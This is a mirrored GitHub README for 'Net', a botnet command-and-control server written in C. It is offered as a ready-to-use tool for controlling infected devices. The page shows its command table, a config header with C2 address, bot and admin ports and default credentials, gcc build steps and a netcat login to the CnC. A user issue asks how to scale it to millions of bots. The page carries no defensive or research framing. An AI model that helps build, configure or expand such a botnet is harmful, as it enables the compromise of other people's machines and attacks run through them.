Giter Club home page Giter Club logo

net's Introduction


Net - A botnet written in C.

Net is a very easy-to-use botnet that has several options while being highly customizable.

Version

Features

Feature Description
Multi-threading The server works in the background while the CLI is running.
Sending data You can send data to all the connected devices.
Clean interface Net has an easy-to-use clean CLI that is easy to navigate.
Dynamic Commands Net makes it very easy for you to add your own commands.

Dynamic Commands & Custom Commands

To add commands, simply create your function and then add the custom command and function to botnet_commands as shown below.

struct function botnet_commands[] = {
    {"custom_command", custom_function}, // <- The custom command goes right here! Make sure you have already written your function!
    {"?", help_menu},
    {"help", help_menu},
    {"bots", bot_count},
    {"list", bot_count},
    {"server", cnc_details},
    {"banner", display_banner},
    {"clear", clear_screen},
    {"cls", clear_screen},
};

Configuration

To edit the configuration for the botnet, head over to includes/config/config.h.

#pragma once


/*
    *    includes/config/config.h
    *    Date: 11/09/21
    *    Author: 0x1CA3
*/


#define USERNAME "admin"
#define PASSWORD "password"
#define MAX_DEVICES 99999
#define CNC_IP "127.0.0.1"
#define CNC_PORT 1337 /* This is the port your bots/infected devices will use to connect */
#define ADMIN_PORT 1233 /* This is the port you will use when connecting to the admin panel */					       

Installation & Setup

gcc -o net net.c -lpthread
./net
Open up a new terminal window
Connect to the CnC | Example: nc 127.0.0.1 3434
Login with the default credentials [admin:password]

Update Log

[11/9/21] - Removed 'adb_check' option
[11/9/21] - Remade 'Net'
[9/14/21] - Created 'Net'

Screenshots

botnet.png

Credits

https://github.com/0x1CA3

Contributions ๐ŸŽ‰

All contributions are accepted, simply open an Issue / Pull request.

net's People

Contributors

0x1ca3 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar

net's Issues

Compiling Error

Which Gcc compiler version used to compile it ? Because i tried with latest GCC compiler and it gives me errors.
image
image
image
image

Another Question can it handle more than 99999 connections ? Can it handle millions connections?
Or what is the max. Number of bots Limit i can edit to it ?

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.